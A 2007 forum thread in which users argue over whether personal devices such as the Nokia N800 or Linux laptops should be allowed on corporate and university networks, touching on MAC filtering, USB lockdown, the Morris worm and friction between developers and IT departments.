Reply
Thread Tools
iball's Avatar
Posts: 729 | Thanked: 19 times | Joined on Mar 2007
#21
Originally Posted by Hedgecore View Post
I'm running Ubuntu at home and I can't tell you whether I do or not.
Then you need to get the phuck out of the IT industry.
It's people like you who "run things" and have no idea what they're doing that is destroying the will to live of those of us who do know what we're doing.
In other words, that one sentence you wrote nullifies your entire argument and makes you look like a clueless *****.

Where I work we're all about open source and Linux and the president of the company has told us "you're network engineers, you know what's safe and what isn't. If I can't trust you, then this whole thing falls apart."
But hey, I guess anyone complaining that they can't bring an IT into the workplace doesn't have a really important job there.
__________________
Kicking Nokia in the jimmy, one marketing exec at a time.
Originally Posted by Mr. T
Well maybe Mr. T hacked the game, and made a mowhawk class? And maybe Mr. T is pretty handy with computers? Had that occurred to you Mr. Condescending Director?

Last edited by iball; 2007-12-08 at 14:16.
 
Hedgecore's Avatar
Posts: 1,361 | Thanked: 115 times | Joined on Oct 2005 @ Toronto, Ontario, Canada
#22
WOW. I've been trying to lay back and have an exploratory conversation but I'm done with that.

I will not, and have never written a 30 page diatribe to contain every possible angle to qualify things that I've said.

If you think you can sit back and tell me your Linux box is 100% secure and you're sure of that, then you're deluded unless you just installed and it's never achieved connectivity. That's the fun part about security breaches, they're usually not evident the second they happen. I think that attitude means I *should* stay into IT (it seems you're not considering that it goes beyond site support and development). The last person I would want to work with is some overconfident egomaniac with a smug look on his face. You're making a lot of assumptions that I sit back and "run things" but I don't. I've done a lot of server side/infrastructure related work (both admin and development) and aren't enough of a jerk to think my work is the be all and end all. So far as I know my Ubuntu box is clean. So far as I know, someone in a cabin in Russia hasn't come out with anything that I've never seen or heard about before. That makes me realistic, not clueless. My IT regularly comes with me into the workplace. It only connects to the Wifi provided for clients that's solely an internet connection, nothing to do with our network.

And Jerome... obviously I can form somewhat coherent sentences, shouldn't immediately qualify me to know the obvious - - that security goes beyond malware/viruses? Any CC related call centers operate as a clean room (no paper, pens, recorders, etc.) and there are a host of other physical security concerns. Machines are locked with strict policies through AD to prevent agents from running anything that could conceivably help them scoop numbers/info. I'm not getting into all the details but jeeze... and NO, that machine wasn't the only repository of vital data, but it was a COPY. One which *I* wouldn't feel comfortable having walk out the door with a now non-employee. When you quit your manager's job at McDonalds do they let you keep a copy of the key to the safe?

And to the snotty developers getting their knickers in a knot. (As I've said, I *DO* development work, most people I work with I like, a lot drive me crazy as bat sh*t for their poor practices.) You don't even have to post these back, but think about them. Which apply to you?

1.) I resent the fact my work has to go to QA, I checked it myself.
2.) I argue a lot with QA
3.) When I get specs I try to improve them and sometimes that takes longer than the project initially allotted.
4.) I'm awesome, the organization couldn't survive without me.
5.) This is the only thing I'm good at, I suck in social situations, and I get my neck beard in a knot when people try to stymie my brilliant ideas. I know assembler you f*ck!!!

You can change the wording around if you like, as long as you don't change the jist of the question. (Some developers I know haven't yet achieved the ability to grow facial hair on their neck.)

(P.S. I develop. I'm not site support. If you're going to make sweeping assumptions about me, let's at least get it in the right ballpark.)

Hugs & Kisses,
Hedge
 
Posts: 3,841 | Thanked: 1,079 times | Joined on Nov 2006
#23
Quote:
Originally Posted by TA-t3
The best thing is probably to not allow anything (including USB sticks, flash cards and iPods) inside the corporate system.
Originally Posted by sevo View Post
What with every cheap cellphone double-acting as a media player and every clerk sharing yesterdays Youtube finds, complete with every attached virus, with all friends at work, there are few chances left to enforce that. You won't seperate the generations below 40 from their cellphones short of stripping them of all their clothes and belongings, walking them nude through a shower, and refitting them with a company uniform.
Oh, I never said it was _practical_ The best thing, security wise, is to not allow anything in. In real life though (depending on the place.. there _are_ places where "nothing should be allowed in, period".) it's a compromise. We don't disallow these gadgets where I work, for example. But then the engineers are highly qualified, but more important - there aren't many Windows boxes to find. And of course the wi-fi is outside the corporate firewall.
__________________
N800/OS2007|N900/Maemo5
-- Metalayer-crawler delenda est.
-- Current state: Fed up with everything MeeGo.
 
Posts: 477 | Thanked: 118 times | Joined on Dec 2005 @ Munich, Germany
#24
Originally Posted by Hedgecore View Post
And Jerome... obviously I can form somewhat coherent sentences, shouldn't immediately qualify me to know the obvious - - that security goes beyond malware/viruses? Any CC related call centers operate as a clean room (no paper, pens, recorders, etc.) and there are a host of other physical security concerns. Machines are locked with strict policies through AD to prevent agents from running anything that could conceivably help them scoop numbers/info. I'm not getting into all the details but jeeze... and NO, that machine wasn't the only repository of vital data, but it was a COPY. One which *I* wouldn't feel comfortable having walk out the door with a now non-employee. When you quit your manager's job at McDonalds do they let you keep a copy of the key to the safe?
I am not entirely sure I understand you. If it is operated as a clean room and people can't bring in a pen, how are they going to sneak in a laptop? Really, you confuse me. It is a completely different environment where one cannot connect anything to the network before submitting to a full body search and where one can bring in a laptop full of virii.

All I am saying is: if people can bring in a Nokia to connect to the network, the environment is such that people connecting their home laptop full of virii (or their Linux laptop with a port scanner...) is a definite possibility. In that case, something really sensible (like, e.g. credit card numbers) should not be accessible from that network. So your horror scenario implies gross incompetence from the IT department, and as a consequence I think your horror scenario is not real.

And no: I never had a manager job at McDonald's.
 
Hedgecore's Avatar
Posts: 1,361 | Thanked: 115 times | Joined on Oct 2005 @ Toronto, Ontario, Canada
#25
I didn't mean to imply you did. The "you" in "you have to give your key back" wasn't "you" specifically.

In my scenario there are many sites, the clean room approach is call center specific, and doesn't apply to corporate or any of the support sites. I brought up the cleanroom and physical security because in the midst of getting attacked by neckbeards it was implied that keeping rogue machines off the network was step one of one in securing it.

I wouldn't call it a nightmare scenario at all. All I was trying to say (in spirit of the original post) was that in my line of business (BPO), introducing any potential unknowns isn't acceptable to the clients so we just can't do it. There are contractual fines for all sorts of stupid things and, being accountable, it ain't worth it. We've even seen the effects of it (the last worm was because someone in facilities brought in a laptop and plugged 'er in). This is not incompetence by the IT department (brand new worm, wasn't known yet.), as Linuxrebel said, it was a problem with people. I was happy that it was just ignorant (I don't use that word in a bad sense) users rather than a developer with a sense of entitlement.
 
Posts: 316 | Thanked: 150 times | Joined on May 2006
#26
Originally Posted by djs_tx View Post
It really boils down to platform doesn't it? AFAIK, There's never been a cross platform virus and there's only been one self replicating linux virus in the wild.
You are, of course, talking of worms not virusses. Virusses aren't very common nowadays in comparison to worms and their potential threat on a Windows box is only so great because of the common disposition to run with full admin rights all the time.

The first well-know worm, however was multiplatform (UNIX on DEC VAX boxes and Sun Workstations) and did more damage to the Internet (at the time, 1988) than blaster slammer or any other modern pathogen.

The reason IT security is so paranoid is thanks to Windows success, there is not enough diversity in the platform gene pool.
The reason security is so paranoid is that a level of paranoia is healthy and helps attempt to stay one step ahead of the guys who are out to get you The Windows monoculture just makes us all weaker not more paranoid.

Originally Posted by TA-t3 View Post
The best thing is probably to not allow anything (including USB sticks, flash cards and iPods) inside the corporate system.
Exactly right, but just because something is running Linux doesn't make it any more trustworthy - your IT department still does not know what is running on there. There are much more powerful tools installed by default on a Linux box (things like perl, ssh etc) which can make writing custom software to use the new machine as a conduit into the corporate network much easier, and the custom code will sail through any signature based analysis (AV, malware checks).

Originally Posted by sondjata View Post
our wireless is locked down pretty tight here now and any iPhone, N8xx, has to give up the MAC Address before it is even allowed on the Network.
Sniffing and spoofing MAC addresses is extremely easy and quick. MAC filtering is a level of protection that will serve you for seconds. You may as well not do it. In fact, you'd be better off monitoring and alerting on unauthorised MACs. That way you have a way of knowing a rogue device is attempting to connect to the network.

Originally Posted by sevo View Post
What with every cheap cellphone double-acting as a media player and every clerk sharing yesterdays Youtube finds, complete with every attached virus, with all friends at work, there are few chances left to enforce that.
On a properly managed network there is. There are plenty of packages around that can selectively disable USB (and other) ports based on a centralised policy. You have a business reason for using that USB key? OK, you can use it but only that one, the software will block any other one.
 
Posts: 3,841 | Thanked: 1,079 times | Joined on Nov 2006
#27
[1988] You're talking about the 'finger' worm, right? I remember that the manager in charge of the network at the single point of connection to the Atlantic cable actually pulled the plug, literally, when getting notified about the worm. Thereby stopping it before it arrived, and also disconnecting one whole country from major parts of the internet (or possibly several countries, my memory gets fuzzy).

Anyway, what's interesting about that worm is that it could spread only because of the homogenity of Unix systems at that time.. they all (or nearly all) used the exact same code base for the part which the finger worm penetrated. Today the same trick wouldn't have worked, or at least not with the exponential speed increase that shocked even the worm author. Uniformity.. same operating system and applications installled on the vast majority of computers.. does that remind you of something?
__________________
N800/OS2007|N900/Maemo5
-- Metalayer-crawler delenda est.
-- Current state: Fed up with everything MeeGo.
 
Posts: 316 | Thanked: 150 times | Joined on May 2006
#28
I was talking about the 'morris' worm. It had (at least) three methods of propogation, the finger hole, a hole in sendmail and a brute-force login attempt. It attacked two quite different UNIX flavours with different hardware architectures.
I would be the last person to say that a monoculture is a good thing. I was just pointing out the fallacy in believing that a cross-platform worm is impossible. I will go back and state that a monoculture does not increase the risk of successful attack, but it makes the ramifications of such an attack an order of magnitude more severe.
 
Posts: 227 | Thanked: 51 times | Joined on Feb 2006
#29
Boy has this thread gotten a little hostile...

Cross platform: I agree. Not impossible but uncommon enough that worrying about it is way down the priority list.

People are the problem. You can engineer a great security system and if some employee wants to cause problems, he'll find a way. If you lock down the network so tight that it is very, very hard for anyone to do anything bad then you have created a network environment that is "hostile" for those of us that know what the hell we are doing and want to innovate and do our jobs.

I respect IT, they have a tough job. But I'm laying the groundwork right now to quit and start my own consulting business because I am sick and tired of fighting people in my own company to get the resources to do my job.

IT is so paranoid that they can't see the forest for the trees. My job title is "senior software engineer" for a NASA contractor but they actually made me fight to get admin rights on my boxes. When Symantec blocked download of netcat for some testing, I asked IT to change the virus scanner settings on my box. They said no, netcat be used for hacking. I explained to them I was not trying to hack their network, just do my job but they refused. I even pointed them to a symantec web page that recommends netcat as a troubleshooting tool. No joy.

So it has turned to a hostile relationship. I ignore their rules and get my job done. My boss knows everything I do and how I do it. If they want to fire me, that's fine by me. But because I ignore their crippling rules, I get a lot done and contribute too much to the project to fire. To be clear, I'm not doing anything that will compromise their network and I am not dealing with sensitive data. If I screw anything up, I'll pay the price and get all my privileges yanked.

But from what I hear, IT is a PITA for everyone. So hopefully in late 2008, I'm taking my act solo and working for the highest bidders.

David
__________________
David Smoot
 
Posts: 245 | Thanked: 25 times | Joined on Apr 2007
#30
Really, what a lot of this comes down to (as always) is convenience and ease of use vs. security. You can make a very secure, locked-down system, and it will work well for things like data entry/web/etc. If you need to do things beyond that, you generally need to relax some rules or remove policies - again, I'm speaking VERY generally here - such as adding VisualStudio users to a "Debug" group that has SOME administrator privileges. At my previous university, all USB ports were disabled in BIOS of the machines in a certain lab because a large, costly database lived on a server, and the licensing terms prohibited anything that could be used to copy off that database. The result was a revolt by graduate students that eventually led to the company changing the licensing terms to allow signed affidavits that we would not copy their data. The loss of usability in this case outweighed the added "security" for the data, and caused a lot of work for the IT folks and legal types in re-negotiating the contract. Again, as always, there is no perfect trade-off between ease of use and security.

I work in a university environment that is reasonably secure. All users must authenticate against Active Directory to get access to network resources, public jacks are protected via 802.1x, and private (office) jacks are somewhat protected against things like MAC flooding. The wireless network is secured by WPA2 and a Radius server which authenticates with the AD controller. Windows and Mac client machines must use the site-licensed antivirus, a VPN is in place to connect from home, all outgoing connections are NATed, traffic shaping reduces the burden of file sharing, and strong passwords are enforced along with changes every 60 days, etc. Linux is not an officially sanctioned OS, but I know that I, among others, use it daily in both workstation and server roles, with IT approval for the servers. Thus, I'd classify it as a pretty secure network, certainly on par with some corporate networks, but not as secure as a certain local very large company that I hear about from students. This makes sense, as most of our data is about students, and is protected by Federal privacy laws. It would certainly be bad for it to leak, but it would not cause the end of existence for the university.

How do I know my Linux machine (not N800) is secure? Two reasons:
1. I only run SSH as a service, and have passwords that are secure as defined by the local AD server, and changed every 60 days. The fact that no other servers are running automatically lowers the number of exploits that can be used, but doesn't eliminate all threats. Being behind a NAT firewall also means that the only people that could be hacking against my machine are on-campus, and I know for certain that port-scanning detection is in place on the network, and Ethernet jacks that exhibit the signs of running a port scan are shut down immediately.
2. I run a rootkit checker every week as a cron job and email the report to myself. Could something get by? Yes, but I feel I'm exercising due diligence in protecting the machine and the network by doing so.

So, to return to the original poster's question, "Is my N800 secure? Should it be allowed onto the campus network?" Well, the answer is obviously different than some corporate settings, for the reasons outlined above, but the answer is "If it can meet the same requirements as other devices allowed on the network, then yes". That means, if IT doesn't allow personal laptops or PDA's to connect to local resources, this device would be included. If policy prohibits card readers, this device would also be included. In my case, the device can support the wireless connection security the same as any student laptop, so there's no reason not to allow it on the network. Could it have malware? Yes. Could that malware potentially damage the network, attached devices, or data? Yes. Could a student or faculty laptop have the same effect? Yes. That's why so many protections are on the network, to allow a (for a university) reasonable trade-off between security and ease of use.
 
Reply


 
Forum Jump


All times are GMT. The time now is 02:39.